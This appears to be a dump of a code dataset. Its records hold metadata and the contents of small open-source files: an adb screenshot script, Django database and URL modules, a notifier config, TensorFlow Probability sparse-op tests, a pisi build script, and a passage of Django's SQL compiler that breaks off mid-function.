blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9446b56384f1741e397ae19977d5a6629a625280
|
8d51d35013a4081af42a5d2388c4df960b01ead5
|
/adb_screen.py
|
69fe5f88c496d65de655502e369e1f931f7fc076
|
[] |
no_license
|
1998Don/ledi_git
|
9eae06c6a1c36736f74a56499f52266fd125ea4d
|
b05487361a5536593c842d2587adf0787e7390b1
|
refs/heads/master
| 2023-05-18T03:45:41.772941
| 2021-06-11T04:19:00
| 2021-06-11T04:19:00
| 353,873,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 530
|
py
|
import os
import time
class ScreenRobot:
    """Takes screenshots on a connected Android device through adb."""

    def screen(self, count):
        """Capture the device screen and store it as /sdcard/<count>.png.

        Args:
            count: integer sequence number used as the file name on the device.
        """
        # Build the shell command first, then hand it to adb. (Original
        # comment was "截屏" — "screenshot".)
        command = f"adb shell screencap -p /sdcard/{count}.png"
        os.system(command)
if __name__ == '__main__':
    # Continuously capture device screenshots and pull each one to the host,
    # twice per second, until interrupted with Ctrl-C.
    count = 1
    robot = ScreenRobot()
    while True:
        try:
            robot.screen(count)
            # -a preserves the file's timestamp and mode when copying.
            os.system(f"adb pull -a /sdcard/{count}.png")
            print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), f'picture{count}.png')
            time.sleep(0.5)
            count += 1
        except KeyboardInterrupt:
            # Was a bare `except:` that silently swallowed *every* error;
            # os.system never raises on command failure, so the only
            # expected exception here is Ctrl-C — catch it explicitly.
            break
|
[
"oncwnuBR4VQqq5cn8LD3J51PreWA@git.weixin.qq.com"
] |
oncwnuBR4VQqq5cn8LD3J51PreWA@git.weixin.qq.com
|
1c97b935612b094e79e1637a5a338585a5833fb8
|
3685ccf0910e7780421a57ca15ca5381510390ea
|
/schema_registry/schema_registry/extensions.py
|
a1795b787268361c9b7348c63bd46a7d77b867fc
|
[] |
no_license
|
winex888/federation_graphql
|
9db3e5d6d75a9433906bb5cff34d7fd043380caa
|
00e296ad36b82083c2e16d4800b59cd6b0e2d66e
|
refs/heads/main
| 2023-08-03T09:37:11.038257
| 2023-07-24T10:28:53
| 2023-07-24T10:28:53
| 360,777,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
import logging
from schema_registry.api.models import db
from schema_registry.conf import settings
async def init_db(_app) -> None:
    """Initialize the database connection binding.

    Args:
        _app: application instance (unused; kept for the startup-hook
            signature expected by the framework — TODO confirm against caller).
    """
    logging.info('Подключение к БД... ({db_dsn})'.format(db_dsn=settings.DB_DSN))
    # Bind the db object to the configured DSN with pool limits from settings.
    await db.set_bind(
        settings.DB_DSN,
        echo=settings.POSTGRES.echo,
        min_size=settings.POSTGRES.pool_min_size,
        max_size=settings.POSTGRES.pool_max_size,
        ssl=settings.POSTGRES.ssl,
    )
    try:
        # Cheap round-trip query to verify the connection actually works.
        await db.scalar('select now()')
        logging.info('Подключение к БД прошло успешно')
    except ConnectionRefusedError as ex:
        # Only a refused connection is handled; the error is logged and
        # swallowed (startup continues) — other exceptions propagate.
        logging.error(
            'Ошибка подключение к БД... ({db_dsn}), ошибка: {errors}'.format(
                db_dsn=settings.DB_DSN,
                errors=ex.strerror,
            ),
        )
async def close_db(_app) -> None:
    """Close the database connection binding.

    Args:
        _app: application instance (unused; kept for the shutdown-hook
            signature, mirroring `init_db`).
    """
    logging.info('Отключение подключения к базе дынных...')
    # Remove the bind set up in init_db and close the underlying pool.
    await db.pop_bind().close()
|
[
"winex888@mail.ru"
] |
winex888@mail.ru
|
4bc54103403acae606e53e6f343613459226f1bf
|
e0709b5108445182a64a64acd1fc0523c903aeea
|
/app/urls.py
|
c89c2f3f558822e0ec6f837c824a2b2e3daf3a94
|
[] |
no_license
|
SusanaPavez/ninja-gold
|
1c26fa40aeabf0d45580f02c72861a55d3e7726a
|
2f02eab0acefa5acb6da2653bc8c57eaf2770b95
|
refs/heads/master
| 2023-07-09T20:25:05.218740
| 2021-08-10T00:50:36
| 2021-08-10T00:50:36
| 394,426,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 162
|
py
|
from django.urls import path
from . import views
# Route table for this app: landing page, game view, and game-state reset.
urlpatterns = [
    path('', views.index),          # landing page
    path('juegos/' , views.juego),  # game page ("juegos" = "games")
    path('reset/', views.reset),    # reset game state
]
|
[
"susana.pavez@gmail.com"
] |
susana.pavez@gmail.com
|
331e2392e43bde4b749c5989c07d18264418908c
|
5a3264c41ded21d24d03bc38063468b45505e0e2
|
/venv/lib/python3.6/keyword.py
|
0538dd34072883fdef176cce0915897d0f4ca804
|
[] |
no_license
|
vjs3/playing-with-flask
|
e4635912550ef5317eac99c507fc43c860ccd4fc
|
d2ef8f80a0501752e4a249543c883877cba35f0d
|
refs/heads/master
| 2020-03-23T10:21:05.605400
| 2018-07-18T12:41:07
| 2018-07-18T12:41:07
| 141,438,422
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 47
|
py
|
/Users/vjs3/miniconda3/lib/python3.6/keyword.py
|
[
"vishwajeet.srivastava@produktmacher.com"
] |
vishwajeet.srivastava@produktmacher.com
|
85596fb3ff870c316d4d7b3553f515d5d673f9b9
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/tags/2007/desktop/kde/autostart/actions.py
|
5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356
| 2013-07-23T17:57:58
| 2013-07-23T17:57:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import kde
def setup():
    """Configure the package via the pisi KDE actions API."""
    kde.configure()
def build():
    """Build the package via the pisi KDE actions API."""
    kde.make()
def install():
    """Install the built package via the pisi KDE actions API."""
    kde.install()
|
[
"yusuf.aydemir@istanbul.com"
] |
yusuf.aydemir@istanbul.com
|
219eae34810f92508e8de57b2ebb97decce009db
|
74f5cf339f3d8233d04d3a0be55231d9105bb983
|
/notifier/config.py
|
2ab3c76b41fbdecf7373a627b9966896ac77a6dc
|
[] |
no_license
|
camvi/sample
|
eac77d9fc8e4d6898894c763917a5195158fb666
|
24a8c0ee53ed87cc20a4e3dc7c11860e91265f27
|
refs/heads/master
| 2020-04-16T12:36:04.430211
| 2019-07-16T20:00:05
| 2019-07-16T20:00:05
| 165,587,135
| 2
| 3
| null | 2019-10-30T23:56:05
| 2019-01-14T03:08:48
|
C++
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
# SMTP settings for outgoing notification e-mail. Credential fields are blank
# placeholders to be filled per deployment; "enabled" gates the feature.
email_options = {
    "from_addr": '',
    "from_addr_password": '',
    "smtp_server": '',
    "smtp_port": 587,  # standard SMTP submission port
    "ssl": False,
    "to_addr": "",
    "enabled": False
}
# Twilio SMS notification credentials; disabled by default.
twilio_options = {
    'sid': '',
    'token': '',
    'phone': '',       # sending number
    'to_phone': "",    # recipient number
    "enabled": False
}
# Connection details for the CAMVI server this notifier talks to.
camvi_options = {
    "ip": 'localhost',
    "port": '8080',
    "username": 'admin',
    "password": 'admin'
}
|
[
"steven.kan@camvitech.com"
] |
steven.kan@camvitech.com
|
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268
| 2019-12-06T17:35:17
| 2019-12-06T17:35:17
| 213,819,828
| 0
| 0
|
Apache-2.0
| 2019-10-09T04:20:19
| 2019-10-09T04:20:19
| null |
UTF-8
|
Python
| false
| false
| 6,549
|
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
  """Tests for `tfp.math.dense_to_sparse`."""
  # Copied (with modifications) from:
  # tensorflow/contrib/layers/python/ops/sparse_ops.py.

  def test_dense_to_sparse_1d(self):
    st = tfp.math.dense_to_sparse([1, 0, 2, 0])
    result = self.evaluate(st)
    self.assertEqual(result.indices.dtype, np.int64)
    self.assertEqual(result.values.dtype, np.int32)
    self.assertEqual(result.dense_shape.dtype, np.int64)
    self.assertAllEqual([[0], [2]], result.indices)
    self.assertAllEqual([1, 2], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_1d_float(self):
    st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
    result = self.evaluate(st)
    self.assertEqual(result.indices.dtype, np.int64)
    self.assertEqual(result.values.dtype, np.float32)
    self.assertEqual(result.dense_shape.dtype, np.int64)
    self.assertAllEqual([[0], [2]], result.indices)
    self.assertAllClose([1.5, 2.3], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_1d_bool(self):
    st = tfp.math.dense_to_sparse([True, False, True, False])
    result = self.evaluate(st)
    self.assertEqual(result.indices.dtype, np.int64)
    # np.bool_ replaces the np.bool alias (deprecated in NumPy 1.20,
    # removed in NumPy 1.24).
    self.assertEqual(result.values.dtype, np.bool_)
    self.assertEqual(result.dense_shape.dtype, np.int64)
    self.assertAllEqual([[0], [2]], result.indices)
    self.assertAllEqual([True, True], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_1d_str(self):
    st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
    result = self.evaluate(st)
    self.assertEqual(result.indices.dtype, np.int64)
    # np.object_ replaces the np.object alias (deprecated in NumPy 1.20,
    # removed in NumPy 1.24).
    self.assertEqual(result.values.dtype, np.object_)
    self.assertEqual(result.dense_shape.dtype, np.int64)
    self.assertAllEqual([[0], [2]], result.indices)
    self.assertAllEqual([b'qwe', b'ewq'], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_1d_str_special_ignore(self):
    st = tfp.math.dense_to_sparse(
        [b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
    result = self.evaluate(st)
    self.assertEqual(result.indices.dtype, np.int64)
    self.assertEqual(result.values.dtype, np.object_)
    self.assertEqual(result.dense_shape.dtype, np.int64)
    self.assertAllEqual([[1], [2], [3]], result.indices)
    self.assertAllEqual([b'', b'ewq', b''], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_2d(self):
    st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
    result = self.evaluate(st)
    self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
                        result.indices)
    self.assertAllEqual([1, 2, 3, 4, 5], result.values)
    self.assertAllEqual([2, 4], result.dense_shape)

  def test_dense_to_sparse_3d(self):
    st = tfp.math.dense_to_sparse(
        [[[1, 2, 0, 0],
          [3, 4, 5, 0]],
         [[7, 8, 0, 0],
          [9, 0, 0, 0]]])
    result = self.evaluate(st)
    self.assertAllEqual(
        [[0, 0, 0],
         [0, 0, 1],
         [0, 1, 0],
         [0, 1, 1],
         [0, 1, 2],
         [1, 0, 0],
         [1, 0, 1],
         [1, 1, 0]],
        result.indices)
    self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
    self.assertAllEqual([2, 2, 4], result.dense_shape)

  def test_dense_to_sparse_unknown_1d_shape(self):
    # Static shape is unknown in the leading dimension.
    tensor = tf1.placeholder_with_default(
        np.array([0, 100, 0, 3], np.int32), shape=[None])
    st = tfp.math.dense_to_sparse(tensor)
    result = self.evaluate(st)
    self.assertAllEqual([[1], [3]], result.indices)
    self.assertAllEqual([100, 3], result.values)
    self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_unknown_3d_shape(self):
    tensor = tf1.placeholder_with_default(
        np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
                 np.int32),
        shape=[None, None, None])
    st = tfp.math.dense_to_sparse(tensor)
    result = self.evaluate(st)
    self.assertAllEqual(
        [[0, 0, 0],
         [0, 0, 1],
         [0, 1, 0],
         [0, 1, 1],
         [0, 1, 2],
         [1, 0, 0],
         [1, 0, 1],
         [1, 1, 0]],
        result.indices)
    self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
    self.assertAllEqual([2, 2, 4], result.dense_shape)

  def test_dense_to_sparse_unknown_rank(self):
    # Rank itself is unknown (shape=None).
    ph = tf1.placeholder_with_default(
        np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
    st = tfp.math.dense_to_sparse(ph)
    result = self.evaluate(st)
    self.assertAllEqual(
        [[0, 0],
         [0, 1],
         [1, 0],
         [1, 1],
         [1, 2]],
        result.indices)
    self.assertAllEqual([1, 2, 3, 4, 5], result.values)
    self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
  # Delegate to the TensorFlow test runner when executed directly.
  tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
b103132e0bee93fd37295128ccea5a1e416e708e
|
3cdb4faf34d8375d6aee08bcc523adadcb0c46e2
|
/web/env/lib/python3.6/site-packages/django/db/models/sql/compiler.py
|
27b8cc343b29121d30713bacbde5e9dfc595aef5
|
[
"MIT",
"GPL-3.0-only"
] |
permissive
|
rizwansoaib/face-attendence
|
bc185d4de627ce5adab1cda7da466cb7a5fddcbe
|
59300441b52d32f3ecb5095085ef9d448aef63af
|
refs/heads/master
| 2020-04-25T23:47:47.303642
| 2019-09-12T14:26:17
| 2019-09-12T14:26:17
| 173,157,284
| 45
| 12
|
MIT
| 2020-02-11T23:47:55
| 2019-02-28T17:33:14
|
Python
|
UTF-8
|
Python
| false
| false
| 67,037
|
py
|
import collections
import functools
import re
import warnings
from itertools import chain
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import OrderBy, Random, RawSQL, Ref
from django.db.models.query_utils import QueryWrapper, select_related_descend
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, MULTI, NO_RESULTS, ORDER_DIR, SINGLE,
)
from django.db.models.sql.query import Query, get_order_dir
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, NotSupportedError
from django.utils.deprecation import RemovedInDjango30Warning
from django.utils.inspect import func_supports_parameter
# Sentinel for SQLCompiler.compile(select_format=...): identity-checked there
# to force output_field.select_format() even when the query is a subquery.
FORCE = object()
class SQLCompiler:
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {'*': '*'}
# The select, klass_info, and annotations are needed by QuerySet.iterator()
# these are set as a side-effect of executing the query. Note that we calculate
# separately a list of extra select columns needed for grammatical correctness
# of the query, but these columns are not included in self.select.
self.select = None
self.annotation_col_map = None
self.klass_info = None
self.ordering_parts = re.compile(r'(.*)\s(ASC|DESC)(.*)')
def setup_query(self):
if all(self.query.alias_refcount[a] == 0 for a in self.query.alias_map):
self.query.get_initial_alias()
self.select, self.klass_info, self.annotation_col_map = self.get_select()
self.col_count = len(self.select)
def pre_sql_setup(self):
"""
Do any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
self.setup_query()
order_by = self.get_order_by()
self.where, self.having = self.query.where.split_having()
extra_select = self.get_extra_select(order_by, self.select)
self.has_extra_select = bool(extra_select)
group_by = self.get_group_by(self.select + extra_select, order_by)
return extra_select, order_by, group_by
def get_group_by(self, select, order_by):
"""
Return a list of 2-tuples of form (sql, params).
The logic of what exactly the GROUP BY clause contains is hard
to describe in other words than "if it passes the test suite,
then it is correct".
"""
# Some examples:
# SomeModel.objects.annotate(Count('somecol'))
# GROUP BY: all fields of the model
#
# SomeModel.objects.values('name').annotate(Count('somecol'))
# GROUP BY: name
#
# SomeModel.objects.annotate(Count('somecol')).values('name')
# GROUP BY: all cols of the model
#
# SomeModel.objects.values('name', 'pk').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# SomeModel.objects.values('name').annotate(Count('somecol')).values('pk')
# GROUP BY: name, pk
#
# In fact, the self.query.group_by is the minimal set to GROUP BY. It
# can't be ever restricted to a smaller set, but additional columns in
# HAVING, ORDER BY, and SELECT clauses are added to it. Unfortunately
# the end result is that it is impossible to force the query to have
# a chosen GROUP BY clause - you can almost do this by using the form:
# .values(*wanted_cols).annotate(AnAggregate())
# but any later annotations, extra selects, values calls that
# refer some column outside of the wanted_cols, order_by, or even
# filter calls can alter the GROUP BY clause.
# The query.group_by is either None (no GROUP BY at all), True
# (group by select fields), or a list of expressions to be added
# to the group by.
if self.query.group_by is None:
return []
expressions = []
if self.query.group_by is not True:
# If the group by is set to a list (by .values() call most likely),
# then we need to add everything in it to the GROUP BY clause.
# Backwards compatibility hack for setting query.group_by. Remove
# when we have public API way of forcing the GROUP BY clause.
# Converts string references to expressions.
for expr in self.query.group_by:
if not hasattr(expr, 'as_sql'):
expressions.append(self.query.resolve_ref(expr))
else:
expressions.append(expr)
# Note that even if the group_by is set, it is only the minimal
# set to group by. So, we need to add cols in select, order_by, and
# having into the select in any case.
for expr, _, _ in select:
cols = expr.get_group_by_cols()
for col in cols:
expressions.append(col)
for expr, (sql, params, is_ref) in order_by:
# Skip References to the select clause, as all expressions in the
# select clause are already part of the group by.
if not expr.contains_aggregate and not is_ref:
expressions.extend(expr.get_source_expressions())
having_group_by = self.having.get_group_by_cols() if self.having else ()
for expr in having_group_by:
expressions.append(expr)
result = []
seen = set()
expressions = self.collapse_group_by(expressions, having_group_by)
for expr in expressions:
sql, params = self.compile(expr)
if (sql, tuple(params)) not in seen:
result.append((sql, params))
seen.add((sql, tuple(params)))
return result
def collapse_group_by(self, expressions, having):
# If the DB can group by primary key, then group by the primary key of
# query's main model. Note that for PostgreSQL the GROUP BY clause must
# include the primary key of every table, but for MySQL it is enough to
# have the main table's primary key.
if self.connection.features.allows_group_by_pk:
# Determine if the main model's primary key is in the query.
pk = None
for expr in expressions:
# Is this a reference to query's base table primary key? If the
# expression isn't a Col-like, then skip the expression.
if (getattr(expr, 'target', None) == self.query.model._meta.pk and
getattr(expr, 'alias', None) == self.query.base_table):
pk = expr
break
# If the main model's primary key is in the query, group by that
# field, HAVING expressions, and expressions associated with tables
# that don't have a primary key included in the grouped columns.
if pk:
pk_aliases = {
expr.alias for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key
}
expressions = [pk] + [
expr for expr in expressions
if expr in having or (
getattr(expr, 'alias', None) is not None and expr.alias not in pk_aliases
)
]
elif self.connection.features.allows_group_by_selected_pks:
# Filter out all expressions associated with a table's primary key
# present in the grouped columns. This is done by identifying all
# tables that have their primary key included in the grouped
# columns and removing non-primary key columns referring to them.
# Unmanaged models are excluded because they could be representing
# database views on which the optimization might not be allowed.
pks = {
expr for expr in expressions
if hasattr(expr, 'target') and expr.target.primary_key and expr.target.model._meta.managed
}
aliases = {expr.alias for expr in pks}
expressions = [
expr for expr in expressions if expr in pks or getattr(expr, 'alias', None) not in aliases
]
return expressions
def get_select(self):
"""
Return three values:
- a list of 3-tuples of (expression, (sql, params), alias)
- a klass_info structure,
- a dictionary of annotations
The (sql, params) is what the expression will produce, and alias is the
"AS alias" for the column (possibly None).
The klass_info structure contains the following information:
- The base model of the query.
- Which columns for that model are present in the query (by
position of the select clause).
- related_klass_infos: [f, klass_info] to descent into
The annotations is a dictionary of {'attname': column position} values.
"""
select = []
klass_info = None
annotations = {}
select_idx = 0
for alias, (sql, params) in self.query.extra_select.items():
annotations[alias] = select_idx
select.append((RawSQL(sql, params), alias))
select_idx += 1
assert not (self.query.select and self.query.default_cols)
if self.query.default_cols:
cols = self.get_default_columns()
else:
# self.query.select is a special case. These columns never go to
# any model.
cols = self.query.select
if cols:
select_list = []
for col in cols:
select_list.append(select_idx)
select.append((col, None))
select_idx += 1
klass_info = {
'model': self.query.model,
'select_fields': select_list,
}
for alias, annotation in self.query.annotation_select.items():
annotations[alias] = select_idx
select.append((annotation, alias))
select_idx += 1
if self.query.select_related:
related_klass_infos = self.get_related_selections(select)
klass_info['related_klass_infos'] = related_klass_infos
def get_select_from_parent(klass_info):
for ki in klass_info['related_klass_infos']:
if ki['from_parent']:
ki['select_fields'] = (klass_info['select_fields'] +
ki['select_fields'])
get_select_from_parent(ki)
get_select_from_parent(klass_info)
ret = []
for col, alias in select:
try:
sql, params = self.compile(col, select_format=True)
except EmptyResultSet:
# Select a predicate that's always False.
sql, params = '0', ()
ret.append((col, (sql, params), alias))
return ret, klass_info, annotations
def get_order_by(self):
"""
Return a list of 2-tuples of form (expr, (sql, params, is_ref)) for the
ORDER BY clause.
The order_by clause can alter the select clause (for example it
can add aliases to clauses that do not yet have one, or it can
add totally new select clauses).
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = (self.query.order_by or self.query.get_meta().ordering or [])
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
order_by = []
for field in ordering:
if hasattr(field, 'resolve_expression'):
if not isinstance(field, OrderBy):
field = field.asc()
if not self.query.standard_ordering:
field.reverse_ordering()
order_by.append((field, False))
continue
if field == '?': # random
order_by.append((OrderBy(Random()), False))
continue
col, order = get_order_dir(field, asc)
descending = order == 'DESC'
if col in self.query.annotation_select:
# Reference to expression in SELECT clause
order_by.append((
OrderBy(Ref(col, self.query.annotation_select[col]), descending=descending),
True))
continue
if col in self.query.annotations:
# References to an expression which is masked out of the SELECT clause
order_by.append((
OrderBy(self.query.annotations[col], descending=descending),
False))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
order_by.append((
OrderBy(
RawSQL('%s.%s' % (self.quote_name_unless_alias(table), col), []),
descending=descending
), False))
continue
if not self.query._extra or col not in self.query._extra:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
order_by.extend(self.find_ordering_name(
field, self.query.get_meta(), default_order=asc))
else:
if col not in self.query.extra_select:
order_by.append((
OrderBy(RawSQL(*self.query.extra[col]), descending=descending),
False))
else:
order_by.append((
OrderBy(Ref(col, RawSQL(*self.query.extra[col])), descending=descending),
True))
result = []
seen = set()
for expr, is_ref in order_by:
if self.query.combinator:
src = expr.get_source_expressions()[0]
# Relabel order by columns to raw numbers if this is a combined
# query; necessary since the columns can't be referenced by the
# fully qualified name and the simple column names may collide.
for idx, (sel_expr, _, col_alias) in enumerate(self.select):
if is_ref and col_alias == src.refs:
src = src.source
elif col_alias:
continue
if src == sel_expr:
expr.set_source_expressions([RawSQL('%d' % (idx + 1), ())])
break
else:
raise DatabaseError('ORDER BY term does not match any column in the result set.')
resolved = expr.resolve_expression(
self.query, allow_joins=True, reuse=None)
sql, params = self.compile(resolved)
# Don't add the same column twice, but the order direction is
# not taken into account so we strip it. When this entire method
# is refactored into expressions, then we can check each part as we
# generate it.
without_ordering = self.ordering_parts.search(sql).group(1)
if (without_ordering, tuple(params)) in seen:
continue
seen.add((without_ordering, tuple(params)))
result.append((resolved, (sql, params, is_ref)))
return result
def get_extra_select(self, order_by, select):
extra_select = []
if self.query.distinct and not self.query.distinct_fields:
select_sql = [t[1] for t in select]
for expr, (sql, params, is_ref) in order_by:
without_ordering = self.ordering_parts.search(sql).group(1)
if not is_ref and (without_ordering, params) not in select_sql:
extra_select.append((expr, (without_ordering, params), None))
return extra_select
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select or (
name in self.query.external_aliases and name not in self.query.table_map)):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
def compile(self, node, select_format=False):
vendor_impl = getattr(node, 'as_' + self.connection.vendor, None)
if vendor_impl:
sql, params = vendor_impl(self, self.connection)
else:
sql, params = node.as_sql(self, self.connection)
if select_format is FORCE or (select_format and not self.query.subquery):
return node.output_field.select_format(self, sql, params)
return sql, params
def get_combinator_sql(self, combinator, all):
features = self.connection.features
compilers = [
query.get_compiler(self.using, self.connection)
for query in self.query.combined_queries if not query.is_empty()
]
if not features.supports_slicing_ordering_in_compound:
for query, compiler in zip(self.query.combined_queries, compilers):
if query.low_mark or query.high_mark:
raise DatabaseError('LIMIT/OFFSET not allowed in subqueries of compound statements.')
if compiler.get_order_by():
raise DatabaseError('ORDER BY not allowed in subqueries of compound statements.')
parts = ()
for compiler in compilers:
try:
# If the columns list is limited, then all combined queries
# must have the same columns list. Set the selects defined on
# the query on all combined queries, if not already set.
if not compiler.query.values_select and self.query.values_select:
compiler.query.set_values((
*self.query.extra_select,
*self.query.values_select,
*self.query.annotation_select,
))
parts += (compiler.as_sql(),)
except EmptyResultSet:
# Omit the empty queryset with UNION and with DIFFERENCE if the
# first queryset is nonempty.
if combinator == 'union' or (combinator == 'difference' and parts):
continue
raise
if not parts:
raise EmptyResultSet
combinator_sql = self.connection.ops.set_operators[combinator]
if all and combinator == 'union':
combinator_sql += ' ALL'
braces = '({})' if features.supports_slicing_ordering_in_compound else '{}'
sql_parts, args_parts = zip(*((braces.format(sql), args) for sql, args in parts))
result = [' {} '.format(combinator_sql).join(sql_parts)]
params = []
for part in args_parts:
params.extend(part)
return result, params
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
refcounts_before = self.query.alias_refcount.copy()
try:
extra_select, order_by, group_by = self.pre_sql_setup()
for_update_part = None
# Is a LIMIT/OFFSET clause needed?
with_limit_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
combinator = self.query.combinator
features = self.connection.features
if combinator:
if not getattr(features, 'supports_select_{}'.format(combinator)):
raise NotSupportedError('{} is not supported on this database backend.'.format(combinator))
result, params = self.get_combinator_sql(combinator, self.query.combinator_all)
else:
distinct_fields, distinct_params = self.get_distinct()
# This must come after 'select', 'ordering', and 'distinct'
# (see docstring of get_from_clause() for details).
from_, f_params = self.get_from_clause()
where, w_params = self.compile(self.where) if self.where is not None else ("", [])
having, h_params = self.compile(self.having) if self.having is not None else ("", [])
result = ['SELECT']
params = []
if self.query.distinct:
distinct_result, distinct_params = self.connection.ops.distinct_sql(
distinct_fields,
distinct_params,
)
result += distinct_result
params += distinct_params
out_cols = []
col_idx = 1
for _, (s_sql, s_params), alias in self.select + extra_select:
if alias:
s_sql = '%s AS %s' % (s_sql, self.connection.ops.quote_name(alias))
elif with_col_aliases:
s_sql = '%s AS %s' % (s_sql, 'Col%d' % col_idx)
col_idx += 1
params.extend(s_params)
out_cols.append(s_sql)
result += [', '.join(out_cols), 'FROM', *from_]
params.extend(f_params)
if self.query.select_for_update and self.connection.features.has_select_for_update:
if self.connection.get_autocommit():
raise TransactionManagementError('select_for_update cannot be used outside of a transaction.')
